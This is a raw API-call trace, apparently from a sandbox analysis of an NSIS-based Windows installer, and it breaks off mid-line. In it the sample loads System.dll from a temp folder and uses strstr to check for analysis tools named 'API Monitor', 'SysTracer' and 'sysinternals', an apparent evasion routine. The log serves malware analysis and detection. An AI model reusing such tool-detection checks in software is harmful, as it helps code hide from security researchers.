lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.510] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.510] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.510] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.510] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.510] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.510] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.510] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.510] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.510] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.511] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.511] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.511] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.511] lstrcpynA (in: lpString1=0x340df8, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.511] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.511] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.511] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.511] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.511] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.511] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.511] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.511] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.511] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.511] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.512] lstrlenA (lpString="0") returned 1 [0158.512] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.512] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.512] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.512] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.512] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.512] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.512] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.512] lstrlenA (lpString="0") returned 1 [0158.512] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrlenA (lpString="") returned 0 [0158.512] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.512] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.512] lstrlenA (lpString="3399936") returned 7 [0158.512] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.512] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.512] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.512] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.512] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.512] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.512] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrlenA (lpString="") returned 0 [0158.512] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.512] lstrlenA (lpString="") returned 0 [0158.513] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.513] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.513] lstrlenA (lpString="") returned 0 [0158.513] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.513] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.513] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.513] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.513] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.513] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.513] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.513] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.513] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.513] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.513] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.513] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.513] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.513] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.513] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.514] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.514] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.514] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.514] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.514] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.514] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.514] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.514] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.514] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.514] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.514] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.514] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.514] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.514] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.514] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.514] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.514] lstrlenA (lpString="0") returned 1 [0158.514] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.514] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.514] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.514] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.515] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.515] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.515] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.515] lstrlenA (lpString="0") returned 1 [0158.515] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrlenA (lpString="") returned 0 [0158.515] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.515] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.515] lstrlenA (lpString="3399936") returned 7 [0158.515] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.515] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.515] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.515] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.515] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.515] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.515] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrlenA (lpString="") returned 0 [0158.515] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.515] lstrlenA (lpString="") returned 0 [0158.515] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.516] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.516] lstrlenA (lpString="") returned 0 [0158.516] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.516] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.516] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.516] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.516] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.516] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.516] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.516] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.516] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.516] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.516] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.516] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.516] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.517] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.517] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.517] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.517] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.517] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.517] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.517] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.517] lstrcpynA (in: lpString1=0x340df8, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.517] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.517] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.517] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.517] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.517] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.517] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.517] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.517] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.517] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.517] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.517] lstrlenA (lpString="0") returned 1 [0158.517] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.517] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.518] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.518] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.518] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.518] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.518] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.518] lstrlenA (lpString="0") returned 1 [0158.518] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.518] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.518] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.518] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.518] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.518] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.518] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.518] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.518] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.518] lstrlenA (lpString="3399936") returned 7 [0158.518] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.518] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.518] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.518] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.518] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.519] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.519] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.519] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.519] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.519] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.519] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65668") returned 5 [0158.519] lstrcpyA (in: lpString1=0x430400, lpString2="65668" | out: lpString1="65668") returned="65668" [0158.519] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.519] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.519] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.519] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.519] lstrlenA (lpString="callback1") returned 9 [0158.519] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.519] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.519] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.519] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.519] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.519] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.519] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.519] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 